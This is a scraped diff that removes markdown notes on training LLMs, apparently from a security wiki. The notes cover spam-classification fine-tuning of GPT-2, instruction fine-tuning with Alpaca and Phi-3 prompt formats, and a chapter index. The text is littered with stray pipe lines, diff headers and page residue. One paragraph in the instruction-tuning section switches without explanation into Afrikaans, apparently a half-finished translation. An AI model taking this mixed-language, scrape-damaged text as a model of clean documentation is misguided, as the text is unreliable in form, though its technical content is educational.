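ham_subset = df[df["Label"] == "ham"].sample(num_spam, random_state=123)
balanced = pd.concat([ham_subset, df[df["Label"] == "spam"]]).sample(frac=1, random_state=123)

# 70% training, 10% validation, 20% testing
train_end = int(len(balanced) * 0.7)
val_end = train_end + int(len(balanced) * 0.1)
train_df = balanced[:train_end]
val_df = balanced[train_end:val_end]
test_df = balanced[val_end:]
```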
### Entries length
|
|
||||||
|
|
||||||
As the training example expects entries (email texts in this case) of the same length, it was decided to make every entry as large as the largest one by adding `<|endoftext|>` token ids as padding.
|
|
||||||
|
|
||||||
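A minimal sketch of that padding step (the example texts are made up; `50256` is the `<|endoftext|>` id of the GPT-2 tokenizer):

```python
import tiktoken
import torch

tokenizer = tiktoken.get_encoding("gpt2")
pad_id = tokenizer.encode("<|endoftext|>", allowed_special={"<|endoftext|>"})[0]  # 50256

texts = ["You won a free prize!", "Are we still meeting tomorrow?"]  # hypothetical emails
encoded = [tokenizer.encode(t) for t in texts]
max_len = max(len(e) for e in encoded)
padded = torch.tensor([e + [pad_id] * (max_len - len(e)) for e in encoded])
print(padded.shape)  # (num_examples, max_len)
```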
### Initialize the model
|
|
||||||
|
|
||||||
Using the open-source pre-trained weights, initialize the model to train. We have already done this before, and following the instructions of [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) you can easily do it.
|
|
||||||
|
|
||||||
## Classification head
|
|
||||||
|
|
||||||
In this specific example (predicting whether a text is spam or not), we are not interested in fine-tuning over the complete vocabulary of GPT2; we only want the new model to say if the email is spam (1) or not (0). Therefore, we are going to **modify the final layer that** gives the probabilities per token of the vocabulary for one that only gives the probabilities of being spam or not (so like a vocabulary of 2 words).
|
|
||||||
|
|
||||||
```python
|
|
||||||
# This code modified the final layer with a Linear one with 2 outs
|
|
||||||
num_classes = 2
|
|
||||||
model.out_head = torch.nn.Linear(
|
|
||||||
|
|
||||||
in_features=BASE_CONFIG["emb_dim"],
|
|
||||||
|
|
||||||
out_features=num_classes
|
|
||||||
)
|
|
||||||
```
|
|
||||||
|
|
||||||
## Parameters to tune
|
|
||||||
|
|
||||||
In order to fine-tune fast, it's easier to not fine-tune all the parameters but only some final ones. This is because it's known that the lower layers generally capture basic language structures and semantics that are broadly applicable. So, just **fine-tuning the last layers is usually enough and faster**.
|
|
||||||
|
|
||||||
```python
|
|
||||||
# This code makes all the parameters of the model untrainable
|
|
||||||
for param in model.parameters():
|
|
||||||
param.requires_grad = False
|
|
||||||
|
|
||||||
# Allow to fine tune the last layer in the transformer block
|
|
||||||
for param in model.trf_blocks[-1].parameters():
|
|
||||||
param.requires_grad = True
|
|
||||||
|
|
||||||
# Allow to fine tune the final layer norm
|
|
||||||
for param in model.final_norm.parameters():
|
|
||||||
|
|
||||||
param.requires_grad = True
|
|
||||||
```
|
|
||||||
|
|
||||||
## Entries to use for training
|
|
||||||
|
|
||||||
In previous sections the LLM was trained by reducing the loss of every predicted token, even though almost all of the predicted tokens were in the input sentence (only 1 at the end was really predicted), so that the model learns the language better.
|
|
||||||
|
|
||||||
In this case we only care about the model being able to predict whether the text is spam or not, so we only care about the last token predicted. Therefore, the previous training loss functions need to be modified to only take that token into account.
|
|
||||||
|
|
||||||
This is implemented in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) as:
|
|
||||||
|
|
||||||
```python
|
|
||||||
def calc_accuracy_loader(data_loader, model, device, num_batches=None):
|
|
||||||
model.eval()
|
|
||||||
correct_predictions, num_examples = 0, 0
|
|
||||||
|
|
||||||
if num_batches is None:
|
|
||||||
num_batches = len(data_loader)
|
|
||||||
else:
|
|
||||||
num_batches = min(num_batches, len(data_loader))
|
|
||||||
for i, (input_batch, target_batch) in enumerate(data_loader):
|
|
||||||
if i < num_batches:
|
|
||||||
input_batch, target_batch = input_batch.to(device), target_batch.to(device)
|
|
||||||
|
|
||||||
with torch.no_grad():
|
|
||||||
logits = model(input_batch)[:, -1, :] # Logits of last output token
|
|
||||||
predicted_labels = torch.argmax(logits, dim=-1)
|
|
||||||
|
|
||||||
num_examples += predicted_labels.shape[0]
|
|
||||||
correct_predictions += (predicted_labels == target_batch).sum().item()
|
|
||||||
else:
|
|
||||||
break
|
|
||||||
return correct_predictions / num_examples
|
|
||||||
|
|
||||||
|
|
||||||
def calc_loss_batch(input_batch, target_batch, model, device):
|
|
||||||
input_batch, target_batch = input_batch.to(device), target_batch.to(device)
|
|
||||||
logits = model(input_batch)[:, -1, :] # Logits of last output token
|
|
||||||
loss = torch.nn.functional.cross_entropy(logits, target_batch)
|
|
||||||
return loss
|
|
||||||
```
|
|
||||||
|
|
||||||
Note how for each batch we are only interested in the **logits of the last token predicted**.
|
|
||||||
|
|
||||||
## Complete GPT2 fine-tune classification code
|
|
||||||
|
|
||||||
You can find all the code to fine-tune GPT2 to be a spam classifier in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb)
|
|
||||||
|
|
||||||
## References
|
|
||||||
|
|
||||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
|
||||||
|
|
@ -1,100 +0,0 @@
|
|||||||
# 7.2. Fine-Tuning to follow instructions
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot.
|
|
||||||
|
|
||||||
## Dataset
|
|
||||||
|
|
||||||
Om 'n LLM fyn af te stem om instruksies te volg, is dit nodig om 'n dataset met instruksies en antwoorde te hê om die LLM fyn af te stem. Daar is verskillende formate om 'n LLM op te lei om instruksies te volg, byvoorbeeld:
|
|
||||||
|
|
||||||
- Die Apply Alpaca prompt styl voorbeeld:
```csharp
Below is an instruction that describes a task. Write a response that appropriately completes the request.

### Instruction:
Calculate the area of a circle with a radius of 5 units.

### Response:
The area of a circle is calculated using the formula \( A = \pi r^2 \). Plugging in the radius of 5 units:

\( A = \pi (5)^2 = \pi \times 25 = 25\pi \) square units.
```

- The Phi-3 prompt style example:
```vbnet
<|User|>
Can you explain what gravity is in simple terms?

<|Assistant|>
Absolutely! Gravity is a force that pulls objects toward each other.
```

Training an LLM with these kinds of datasets instead of just raw text helps the LLM understand that it needs to give specific answers to the questions it receives.

Therefore, one of the first things to do with a dataset that contains requests and responses is to model that data in the desired prompt format, like:
```python
# Code from https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/ch07.ipynb
def format_input(entry):
    instruction_text = (
        f"Below is an instruction that describes a task. "
        f"Write a response that appropriately completes the request."
        f"\n\n### Instruction:\n{entry['instruction']}"
    )

    input_text = f"\n\n### Input:\n{entry['input']}" if entry["input"] else ""

    return instruction_text + input_text


model_input = format_input(data[50])

desired_response = f"\n\n### Response:\n{data[50]['output']}"

print(model_input + desired_response)
```

Then, as always, the dataset needs to be split into sets for training, validation and testing.

## Batching & Data Loaders

Then, all the inputs and expected outputs need to be batched for the training. For this, it's needed to:

- Tokenize the texts
- Pad all the samples to the same length (usually the length will be as big as the context length used to pre-train the LLM)
- Create the expected tokens by shifting the input by 1 in a custom collate function
- Replace some padding tokens with -100 to exclude them from the training loss: after the first `endoftext` token, substitute all the other `endoftext` tokens with -100 (because using `cross_entropy(...,ignore_index=-100)` means that it will ignore targets with -100)
- \[Optional\] Mask using -100 also all the tokens belonging to the question so the LLM learns only how to generate the answer. In the Alpaca style this means masking everything up to `### Response:`

With this created (see the collate sketch below), it's time to create the data loaders for each dataset (training, validation and test).
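
A minimal sketch of such a custom collate function is shown below. It follows the shape of the referenced chapter (`pad_token_id=50256` is GPT-2's `<|endoftext|>` id), but the optional masking of the instruction tokens is left out for brevity; treat the details as an illustration rather than the canonical implementation:

```python
import torch

def custom_collate_fn(batch, pad_token_id=50256, ignore_index=-100, device="cpu"):
    # Each item in `batch` is assumed to be a plain list of token ids (prompt + response)
    batch_max_length = max(len(item) + 1 for item in batch)

    inputs_lst, targets_lst = [], []
    for item in batch:
        new_item = item.copy()
        new_item += [pad_token_id]  # add one <|endoftext|> to mark the end
        # Pad the sequence up to the longest one in the batch
        padded = new_item + [pad_token_id] * (batch_max_length - len(new_item))

        inputs = torch.tensor(padded[:-1])   # what the model sees
        targets = torch.tensor(padded[1:])   # expected output, shifted by 1 token

        # Replace every padding token except the first one with -100 so that
        # cross_entropy(..., ignore_index=-100) ignores them in the loss
        mask = targets == pad_token_id
        indices = torch.nonzero(mask).squeeze()
        if indices.numel() > 1:
            targets[indices[1:]] = ignore_index

        inputs_lst.append(inputs)
        targets_lst.append(targets)

    inputs_tensor = torch.stack(inputs_lst).to(device)
    targets_tensor = torch.stack(targets_lst).to(device)
    return inputs_tensor, targets_tensor
```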

## Load pre-trained LLM & Fine tune & Loss Checking

It's needed to load a pre-trained LLM to fine-tune it. This was already discussed on other pages. Then, it's possible to use the previously used training function to fine-tune the LLM.

During the training it's also possible to see how the training loss and validation loss vary during the epochs to see if the loss is being reduced and if overfitting is occurring.\
Remember that overfitting occurs when the training loss keeps being reduced but the validation loss stops being reduced or even increases. To avoid this, the simplest thing to do is to stop the training at the epoch where this behaviour starts.
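
As a rough sketch of that early-stopping idea (`train_one_epoch` and `compute_validation_loss` are hypothetical helpers standing in for the training and loss-evaluation functions used in the previous chapters; the `patience` value is also just an illustration):

```python
import torch

best_val_loss = float("inf")
patience, epochs_without_improvement = 2, 0  # illustrative values

for epoch in range(num_epochs):
    train_one_epoch(model, train_loader, optimizer, device)        # hypothetical helper
    val_loss = compute_validation_loss(model, val_loader, device)  # hypothetical helper

    if val_loss < best_val_loss:
        best_val_loss = val_loss
        epochs_without_improvement = 0
        torch.save(model.state_dict(), "best_model.pth")  # keep the best checkpoint so far
    else:
        epochs_without_improvement += 1
        if epochs_without_improvement >= patience:
            print(f"Stopping at epoch {epoch + 1}: validation loss no longer improving")
            break
```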

## Response Quality

As this is not a classification fine-tuning where it's possible to trust the loss variations more, it's also important to check the quality of the responses in the testing set. Therefore, it's recommended to gather the generated responses from all the testing sets and **check their quality manually** to see if there are wrong answers (note that it's possible for the LLM to get the format and syntax of the response sentence right but give a completely wrong answer; the loss variation won't reflect this behaviour).\
Note that it's also possible to perform this review by passing the generated responses and the expected responses to **other LLMs and asking them to evaluate the responses**, as sketched after the following list.

Other tests to run to verify the quality of the responses:

1. **Measuring Massive Multitask Language Understanding (**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLU evaluates a model's knowledge and problem-solving abilities across 57 subjects, including humanities, sciences, and more. It uses multiple-choice questions to assess understanding at various difficulty levels, from elementary to advanced professional.
2. [**LMSYS Chatbot Arena**](https://arena.lmsys.org): This platform allows users to compare responses from different chatbots side by side. Users input a prompt, and multiple chatbots generate responses that can be directly compared.
3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**:** AlpacaEval is an automated evaluation framework where an advanced LLM like GPT-4 evaluates the responses of other models to various prompts.
4. **General Language Understanding Evaluation (**[**GLUE**](https://gluebenchmark.com/)**):** GLUE is a collection of nine natural language understanding tasks, including sentiment analysis, textual entailment, and question answering.
5. [**SuperGLUE**](https://super.gluebenchmark.com/)**:** Building upon GLUE, SuperGLUE includes more challenging tasks designed to be difficult for current models.
6. **Beyond the Imitation Game Benchmark (**[**BIG-bench**](https://github.com/google/BIG-bench)**):** BIG-bench is a large-scale benchmark with more than 200 tasks that test a model's abilities in areas like reasoning, translation, and question answering.
7. **Holistic Evaluation of Language Models (**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**):** HELM provides a comprehensive evaluation across various metrics like accuracy, robustness, and fairness.
8. [**OpenAI Evals**](https://github.com/openai/evals)**:** An open-source evaluation framework by OpenAI that allows testing of AI models on custom and standardized tasks.
9. [**HumanEval**](https://github.com/openai/human-eval)**:** A collection of programming problems used to evaluate the code generation abilities of language models.
10. **Stanford Question Answering Dataset (**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**):** SQuAD consists of questions about Wikipedia articles, where models must comprehend the text to answer accurately.
11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**:** A large-scale dataset of trivia questions and answers, along with evidence documents.

and many, many more
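
As a minimal sketch of that LLM-as-a-judge idea (the `query_llm` callable and the 0-100 scoring scale are assumptions for illustration; any chat-completion API or locally hosted model could play the judge role):

```python
def build_judge_prompt(instruction, expected, generated):
    # Ask a stronger model to grade the fine-tuned model's answer
    return (
        f"Given the instruction:\n{instruction}\n\n"
        f"and the reference answer:\n{expected}\n\n"
        f"score the following model answer from 0 to 100 "
        f"(reply with the number only):\n{generated}"
    )

def judge_responses(test_entries, generated_responses, query_llm):
    # `query_llm` is a hypothetical callable that sends a prompt to a judge LLM
    # and returns its text reply.
    scores = []
    for entry, generated in zip(test_entries, generated_responses):
        prompt = build_judge_prompt(entry["instruction"], entry["output"], generated)
        reply = query_llm(prompt)
        try:
            scores.append(int(reply.strip()))
        except ValueError:
            scores.append(None)  # the judge did not reply with a plain number
    valid = [s for s in scores if s is not None]
    return sum(valid) / len(valid) if valid else 0.0
```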

## Follow instructions fine-tuning code

You can find an example of the code to perform this fine-tuning in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py)

## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@ -1,98 +0,0 @@

# LLM Training - Data Preparation

**These are my notes from the very recommended book** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **with some extra information.**

## Basic Information

You should start by reading this post for some basic concepts you should know about:

{{#ref}}
0.-basic-llm-concepts.md
{{#endref}}

## 1. Tokenizing

> [!TIP]
> The goal of this initial phase is very simple: **Split the input into tokens (ids) in a way that makes sense** (a minimal example is sketched below).

{{#ref}}
1.-tokenizing.md
{{#endref}}
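
As a minimal illustration of this phase (assuming the `tiktoken` package, which implements GPT-2's BPE tokenizer, is installed):

```python
import tiktoken

tokenizer = tiktoken.get_encoding("gpt2")  # the BPE tokenizer used by GPT-2

ids = tokenizer.encode("Hello, how are you?")
print(ids)                    # the BPE token ids for the sentence
print(tokenizer.decode(ids))  # back to the original text
```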

## 2. Data Sampling

> [!TIP]
> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase, usually by separating the dataset into sentences of a specific length and also generating the expected response** (a minimal sliding-window example is sketched below).

{{#ref}}
2.-data-sampling.md
{{#endref}}
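
A minimal sketch of the sliding-window sampling idea mentioned in the tip above (window size and stride are example values only):

```python
token_ids = list(range(20))   # stand-in for a tokenized text
max_length, stride = 8, 4     # example window size and step

inputs, targets = [], []
for i in range(0, len(token_ids) - max_length, stride):
    inputs.append(token_ids[i:i + max_length])             # what the model sees
    targets.append(token_ids[i + 1:i + max_length + 1])    # same window shifted by one token

print(inputs[0])   # [0, 1, 2, 3, 4, 5, 6, 7]
print(targets[0])  # [1, 2, 3, 4, 5, 6, 7, 8]
```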

## 3. Token Embeddings

> [!TIP]
> The goal of this third phase is very simple: **Assign each of the previous tokens in the vocabulary a vector of the desired dimensions to train the model.** Each word in the vocabulary will be a point in a space of X dimensions.\
> Note that initially the position of each word in the space is just initialized "randomly" and these positions are trainable parameters (they will be improved during the training).
>
> Moreover, during the token embedding **another layer of embeddings is created** which represents (in this case) the **absolute position of the word in the training sentence**. This way a word in different positions in the sentence will have a different representation (meaning). A minimal sketch follows below.

{{#ref}}
3.-token-embeddings.md
{{#endref}}
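
A minimal sketch of the idea (the dimensions are arbitrary example values, not the ones used elsewhere in this guide):

```python
import torch

vocab_size, context_length, emb_dim = 50257, 4, 8  # example sizes only

token_emb = torch.nn.Embedding(vocab_size, emb_dim)     # one trainable vector per token id
pos_emb = torch.nn.Embedding(context_length, emb_dim)   # one trainable vector per position

token_ids = torch.tensor([[15496, 11, 703, 389]])       # a batch with one 4-token sample
positions = torch.arange(context_length)

x = token_emb(token_ids) + pos_emb(positions)  # token meaning + absolute position
print(x.shape)  # torch.Size([1, 4, 8])
```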

## 4. Attention Mechanisms

> [!TIP]
> The goal of this fourth phase is very simple: **Apply some attention mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\
> A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information.

{{#ref}}
4.-attention-mechanisms.md
{{#endref}}

## 5. LLM Architecture

> [!TIP]
> The goal of this fifth phase is very simple: **Develop the architecture of the full LLM**. Put everything together, apply all the layers and create all the functions to generate text or transform text to IDs and back.
>
> This architecture will be used for both training and predicting text after it has been trained.

{{#ref}}
5.-llm-architecture.md
{{#endref}}

## 6. Pre-training & Loading models

> [!TIP]
> The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used with some loops going over the datasets using the defined loss functions and optimizer to train all the parameters of the model.

{{#ref}}
6.-pre-training-and-loading-models.md
{{#endref}}

## 7.0. LoRA Improvements in fine-tuning

> [!TIP]
> The use of **LoRA reduces a lot the computation** needed to **fine tune** already trained models.

{{#ref}}
7.0.-lora-improvements-in-fine-tuning.md
{{#endref}}

## 7.1. Fine-Tuning for Classification

> [!TIP]
> The goal of this section is to show how to fine-tune an already pre-trained model so that, instead of generating new text, the LLM gives the **probabilities of the given text being categorized in each of the given categories** (like whether a text is spam or not).

{{#ref}}
7.1.-fine-tuning-for-classification.md
{{#endref}}

## 7.2. Fine-Tuning to follow instructions

> [!TIP]
> The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot.

{{#ref}}
7.2.-fine-tuning-to-follow-instructions.md
{{#endref}}
|
|
Loading…
x
Reference in New Issue
Block a user